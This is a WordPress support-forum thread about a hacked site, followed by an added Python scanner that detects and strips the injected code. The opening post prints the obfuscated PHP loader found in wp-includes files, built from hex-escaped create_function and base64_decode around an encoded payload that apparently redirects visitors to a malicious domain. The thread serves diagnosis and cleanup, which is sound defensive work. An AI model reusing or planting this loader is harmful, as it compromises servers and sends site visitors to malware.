Title: Found some malicious code inside l10n.php
Last modified: August 19, 2016

---

# Found some malicious code inside l10n.php

 *  [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/)
 * I opened the l10n.php and found this encrypted code at the top of the file. It
   seemed malicious so I deleted this section immediately. Can someone help me decode
   this one?
 * `<?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\
   x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56
   =$_8b7b("",$_8b7b1f("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
   +KS9zaScsYWRkeGl0KCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuYWRkeGl0KCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ2Nyb3BlcngnKTsgICB9ICB9"));
   $_8b7b1f56();?>`

Viewing 15 replies - 1 through 15 (of 39 total)


 *  Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751352)
 * Found similar code in the following files:
 * wp-includes/
 * 1. kses.php
    2. general-template.php
    3. [more files]
 * I’m currently checking more affected files.
 *  Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751353)
 * **UPDATE:**
 * Almost every .php file in wp-includes was prepended with this code. I think
   this should be high priority for the WordPress developers. It might be a security
   hole for WordPress 3.0.1
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751360)
 * It is a security hole in your server. Inform your host immediately, as others
   are likely hacked. Then: [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
 * [http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/](http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/)
 *  Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751372)
 * I have already sent a report to my hosting provider. However, do you know any
   decryptor software or something that might help in decoding that code?
 * I think the code above translates to something which took advantage of the http.
   php and formatting.php.
 * I will submit the code tomorrow to the research team at the anti-virus company
   where I am currently taking my internship. Maybe they could help.
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751381)
 * I did decrypt the code but will not post it, for obvious reasons. I certainly
   encourage you to do it on your own, however.
 *  Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751382)
 * **UPDATE:**
 * The site redirects to _insomniaboldinfocom.com_. A very high Alexa rank website.
   **Warning!** Don’t visit the site. Google search results showed that it might be
   malicious.
 * Does anyone here know where I can report for a site takedown?
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751391)
 * get the whois info and report it to their host
 *     ```
       Domain Name: INSOMNIABOLDINFOCOM.COM
          Registrar: BIZCN.COM, INC.
          Whois Server: whois.bizcn.com
          Referral URL: http://www.bizcn.com
          Name Server: NS1.HOPERJOPER.RU
          Name Server: NS2.HOPERJOPER.RU
          Status: clientDeleteProhibited
          Status: clientTransferProhibited
          Updated Date: 15-oct-2010
          Creation Date: 15-oct-2010
          Expiration Date: 15-oct-2011
       ```
   
 * Well, that won’t work, as `bizcn.com` is a malware site. Also, with Russian DNS,
   likely won’t be able to do much about it.
 *  Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751392)
 * I don’t know how to decrypt such code. The only thing I can understand is that
   it is inside a `<?php ?>` tag and will run server side.
 * Can you send me your decrypt results at [cipals15@gmail.com](mailto:cipals15@gmail.com)?
   Thanks.
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751395)
 * No – sorry, I won’t send the code as it wouldn’t be ethical. You could send it
   to your host to alert them and see if they will give it to you.
 *  Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751397)
 * The site was only created several weeks ago. Grr.. I hate those bloody hackers.
 * And yeah, one of my tasks at my internship is to collect files from .ru and
   .bg sites which seemed to produce a large volume of excellent malware and virus
   applications.
 * I have checked my .htaccess file and the code seems not malicious. Please confirm:
 *     ```
       # BEGIN WordPress
       <IfModule mod_rewrite.c>
       RewriteEngine On
       RewriteBase /
       RewriteRule ^index\.php$ - [L]
       RewriteCond %{REQUEST_FILENAME} !-f
       RewriteCond %{REQUEST_FILENAME} !-d
       RewriteRule . /index.php [L]
       </IfModule>
       # END WordPress
       ```
   
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751398)
 * that is normal code
 *  Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751403)
 * I think there is nothing more I can do. Thanks for the inputs.
 * I’ve already done a backup of both the WordPress files and the database.
 * This attack cost me about $30 – $50 (that’s small.. I know). But it is still
   money that I’m losing.
 * Currently overwriting all wp-includes files with new files from a fresh install
   of WordPress.
 * I’ll update soon if I find more malicious activities. I will be checking logs.
 *  Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/)
 * (@cipals15)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751406)
 * **UPDATE:**
 * Can’t overwrite **class-http.php** after copying new files. Can someone explain
   to me briefly the function of this PHP file?
 * **UPDATE 2:**
 * a. Found out that my _cache_ folder has a web-permission: **Write**.
 * b. Found this malicious file `.nfs00000000010fea6a000647f3` which only contains
   the code (as mentioned above).
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751409)
 * delete it completely and upload one from a fresh zip
 * what the file does:
 *     ```
       Standardizes the HTTP requests for WordPress. Handles cookies, gzip encoding and decoding, chunk
        * decoding, if HTTP 1.1 and various other difficult HTTP protocol implementations.
        *
        * @link http://trac.wordpress.org/ticket/4779 HTTP API Proposal
       ```
   
 *  [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/)
 * (@rvoodoo)
 * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751410)
 * [http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html](http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html)
 * will help you out I think
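
Added example, not part of the original thread and not any poster's code: a static check for the prepended `<?php /**/ ... ?>` block described in the posts above, which decodes the hex-escaped function names and the base64 string to text for reading without executing anything, and returns the file content with the block stripped. The names `analyze`, `scan_tree` and `hexify` are hypothetical, the regex assumes the wrapper shape quoted in the first post, and the sample input is constructed with a harmless placeholder payload.

```python
import base64
import os
import re

# Shape of the prefix quoted in the thread: "<?php /**/", assignments of
# hex-escaped strings, a base64 literal, then a "$var();" call before "?>".
INJECT_RE = re.compile(r'\A\s*<\?php\s*/\*\*/\s*(?P<body>.*?\$\w+\(\);)\s*\?>', re.S)
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')

def analyze(source):
    """Return (names, payload, cleaned) for an infected file, else None.
    The payload is only decoded to text for reading; nothing is executed."""
    m = INJECT_RE.match(source)
    if not m:
        return None
    literals = STR_RE.findall(m.group('body'))
    names = [HEX_RE.sub(lambda h: chr(int(h.group(1), 16)), s)
             for s in literals if '\\x' in s]
    blob = max((s for s in literals if '\\x' not in s), key=len, default='')
    try:
        payload = base64.b64decode(blob).decode('utf-8', 'replace')
    except ValueError:  # truncated or damaged base64
        payload = ''
    return names, payload, source[m.end():]

def scan_tree(root):
    """Yield .php files under root whose content starts with the prefix."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith('.php'):
                path = os.path.join(dirpath, name)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    if INJECT_RE.match(fh.read()):
                        yield path

def hexify(s):
    """Encode a string as PHP \\xNN escapes (used only to build the sample)."""
    return ''.join('\\x%02x' % ord(c) for c in s)

# Constructed sample: same wrapper shape, harmless placeholder payload.
PAYLOAD = 'echo "constructed placeholder";'
ORIGINAL = '<?php\n// original file content\n'
SAMPLE = ('<?php /**/ $_a="%s";$_b="%s";$_c=$_a("",$_b("%s"));$_c();?>'
          % (hexify('create_function'), hexify('base64_decode'),
             base64.b64encode(PAYLOAD.encode()).decode())) + ORIGINAL

if __name__ == '__main__':
    names, payload, cleaned = analyze(SAMPLE)
    print(names, payload, cleaned == ORIGINAL)
```

Run `scan_tree` against a copy of the site rather than the live tree, and compare any cleaned file with the same file from a fresh WordPress zip before trusting it.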


The topic ‘Found some malicious code inside l10n.php’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 39 replies
 * 4 participants
 * Last reply from: [AITpro](https://wordpress.org/support/users/aitpro/)
 * Last activity: [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/page/3/#post-1751545)
 * Status: not resolved

